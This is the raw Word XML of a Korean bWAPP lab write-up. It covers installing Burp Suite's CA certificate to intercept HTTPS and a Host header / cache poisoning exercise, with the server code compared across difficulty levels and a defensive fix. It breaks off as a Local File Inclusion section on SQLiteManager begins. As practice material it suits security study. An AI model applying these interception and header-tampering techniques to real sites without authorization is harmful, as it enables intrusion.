    <w:p w14:paraId="2A24A9C9" w14:textId="77777777" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA6F97B" w14:textId="76BDBE58" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="683C2DED" w14:textId="77777777" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577F47F6" w14:textId="32478F0A" w:rsidR="00F35A88" w:rsidRPr="0035631E" w:rsidRDefault="00F35A88" w:rsidP="00F345F6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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidR="002A0760" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="002A0760" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TTPS</w:t>
      </w:r>
      <w:r w:rsidR="002A0760" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r w:rsidR="002A0760" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite </w:t>
      </w:r>
      <w:r w:rsidR="002A0760" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>사용법</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4745BA" w14:textId="671DF5EB" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6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Burp Suite를 바탕으로 SSL/TLS 암호화 기반의 HTTPS 웹 사이트를 탐색할 경우 프록시는 인증 기관으로 공유키 인증서로 서명된 각 호스트에 대해 SSL 인증서를 생성하게 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40319F2D" w14:textId="67BAD5F4" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6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1793FB6E" wp14:editId="6142029D">
            <wp:extent cx="6840001" cy="4070900"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2540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07090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AEF153" w14:textId="5B923FA9" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6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CA으로 발급된 인증서는 Burp Suite를 처음 구동하였을 때 로컬 환경에 저장이 된다. HTTPS 웹 사이트에서 Burp Suite Proxy를 사용하려면 브라우저에서 Burp Suite CA 인증서를 신뢰할 수 있는 루트 인증 기관에 설치를 해야 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A126B7" w14:textId="77777777" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213C58A1" w14:textId="3D8242AE" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="00F345F6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01B47938" wp14:editId="3BEA5F49">
            <wp:extent cx="6840001" cy="3652665"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2413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3652665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44D9F0" w14:textId="77DB35C4" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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Burp suite</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">탭 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; Options </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">탭에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">import / export CA certificate </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA9684" w14:textId="0D6F0465" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57E2BF9A" w14:textId="09EBDDD3" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760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097CFC0C" wp14:editId="3F2357ED">
            <wp:extent cx="6840001" cy="5522724"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="209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552272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A9AEE9" w14:textId="6D4E4E3A" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ertificate in DER format </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF58D18" w14:textId="642627F7" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760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2508B029" wp14:editId="11C4A957">
            <wp:extent cx="6840001" cy="5113665"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1079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5113665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90C586" w14:textId="1813DAEB" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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경로와 이름을 지정하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 저장한다</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2150E" w14:textId="77777777" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9FFB2D" w14:textId="09E15161" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:ind w:left="400"/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19B61527" wp14:editId="7DCE13C2">
            <wp:extent cx="6840001" cy="6875976"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="203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6875976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E54234" w14:textId="29B121AB" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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추출한 인증서를 실행하여</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인증서 설치]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클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6561C2" w14:textId="7FA4B058" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0E1C6C" w14:textId="5DFFD3B6" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:ind w:left="40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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BBCB049" wp14:editId="13833B92">
            <wp:extent cx="6840001" cy="5640302"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="177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5640302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69DE56" w14:textId="45DBEA35" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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경로를 [신뢰할 수 있는 루트 인증 기관]으로 지정하고 마침을 누르면 설치된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05040703" w14:textId="051E1256" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB22570" w14:textId="665327DD" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2D32B6" w14:textId="23FF3966" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1149CA43" w14:textId="56E11566" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FED894" w14:textId="32C7562C" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24419680" w14:textId="03376F0A" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AB9180" w14:textId="50F99E30" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13367B3D" w14:textId="2C2297CC" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46262F45" w14:textId="41F052D1" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA5F338" w14:textId="68707645" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D76277B" w14:textId="78D58188" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D7352B" w14:textId="77777777" w:rsidR="004249BE" w:rsidRPr="0035631E" w:rsidRDefault="004249BE" w:rsidP="002A0760">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7981EC0F" w14:textId="77777777" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="002A0760" w:rsidP="002A0760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lastRenderedPageBreak/>
        <w:t xml:space="preserve">[ Sensitive Data Exposure - Host Header Attack (Cache Poisoning) &lt;난이도 : </w:t>
      </w:r>
      <w:r w:rsidR="00D05BD9" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>medium</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D05BD9" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00D05BD9" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>igh</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B83AE" w14:textId="5F74AC5A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난이도</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> medium/high에서도 난이도 low에서와 같이 Host 헤더를 변조해보면 페이지가 깨지지도 않고</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E377644" w14:textId="77777777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here 링크도 비박스의 포탈로 이어지도록 되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAE4CA" w14:textId="0A8E4991" w:rsidR="002A0760" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9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 w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="266B205F" wp14:editId="0F9504AF">
            <wp:extent cx="6840001" cy="3875743"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1079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387574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C5AE0C" w14:textId="148895F0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와</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 같이, &lt;a&gt; 태그의 href 속성의 값이 난이도 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ow에서처럼 Host 헤더의 값을 참조하지 않도록 되어 있다는 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47BF05" w14:textId="77777777" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E780CC5" w14:textId="72405BC4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이제</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 서버 내 코드를 확인해보자.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D687D" w14:textId="77777777" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA8EA9D" w14:textId="5F6E47AB" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="640A5AEF" wp14:editId="012F318B">
            <wp:extent cx="6840001" cy="2297864"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="266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297864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C0572B" w14:textId="45ADBF13" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9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>vi /var/www/bWAPP/hostheader_1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35881D9C" w14:textId="41E4BE1E" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289F183D" w14:textId="44AE19AB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</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 코드는 "Click here to go back to the portal." 텍스트를 출력하는 부분이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF17F0" w14:textId="3BFD465D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lastRenderedPageBreak/>
        <w:t>난이도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l</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>ow에서는 "here" 텍스트에 링크를 걸 때, $_SERVER{"HTTP_HOST"] 변수를 이용하여 Host 헤더를 가져와 링크를 구성하고 있어, Host 헤더가 변조되면 이에 따라 링크도 바뀌도록 되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539A673D" w14:textId="311D869E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난이도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m</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>edium/high에서는 "here" 텍스트에 링크를 걸 때, 다른 값을 참조하지 않고 "portal.php"를 걸어줌으로써 어떤 값에 의해 링크가 영향을 받지 않도록 되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65777B21" w14:textId="77777777" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33BB9760" w14:textId="0069EEA1" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD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처럼</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host Header Attack 또는 Cache Poisoning 공격을 방어하기 위해서는 불필요한 요청 패킷의 헤더를 사용하지 하지 않고 헤더 검증 과정을 통해 헤더가 변조가 발생했는지 체크하는 로직을 추가해야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CEC160" w14:textId="11602FF2" w:rsidR="00D05BD9" w:rsidRPr="0035631E" w:rsidRDefault="00D05BD9" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321C2298" w14:textId="7C67E639" w:rsidR="00EE0AD3" w:rsidRPr="0035631E" w:rsidRDefault="00EE0AD3" w:rsidP="00D05BD9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs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EE0AD3" w:rsidRPr="0035631E" w14:paraId="0CD6C287" w14:textId="77777777" w:rsidTr="00341A30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bookmarkStart w:id="12" w:name="D2"/>
          <w:bookmarkEnd w:id="12"/>
          <w:p w14:paraId="228CC10D" w14:textId="4FCD4C67" w:rsidR="00EE0AD3" w:rsidRPr="0035631E" w:rsidRDefault="00CB76E6" w:rsidP="00EE0AD3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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D1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EE0AD3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4</w:t>
            </w:r>
            <w:r w:rsidR="00EE0AD3"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="00EE0AD3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Local File I</w:t>
            </w:r>
            <w:r w:rsidR="00EE0AD3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n</w:t>
            </w:r>
            <w:r w:rsidR="00EE0AD3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cl</w:t>
            </w:r>
            <w:r w:rsidR="00EE0AD3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u</w:t>
            </w:r>
            <w:r w:rsidR="00EE0AD3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sion(SQLiteManager)</w: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EE0AD3" w:rsidRPr="0035631E" w14:paraId="3A23BDE7" w14:textId="77777777" w:rsidTr="00341A30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5F16E5D" w14:textId="77777777" w:rsidR="00EE0AD3" w:rsidRPr="0035631E" w:rsidRDefault="00EE0AD3" w:rsidP="00341A30">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38F82413" w14:textId="0C4CBB0B" w:rsidR="00EE0AD3" w:rsidRPr="0035631E" w:rsidRDefault="00633431" w:rsidP="00D05BD9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  <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183E42B4" wp14:editId="2843CD05">
            <wp:extent cx="6840001" cy="1578311"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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57831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65AFF" w14:textId="270EE116" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431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비박스의</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQLiteManager 버전이 Local File Inclusion에 취약하다고 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B055E2" w14:textId="7AF8E548" w:rsidR="00633431" w:rsidRPr="0035631E" w:rsidRDefault="00633431" w:rsidP="00633431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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>그리고</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 힌트로 쿠키를 </w:t>
      </w:r>
      <w:r w:rsidR="00FB583C" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>좋아</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>한다고 하는데 cookies 텍스트에 CVE 링크가 걸려있다</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
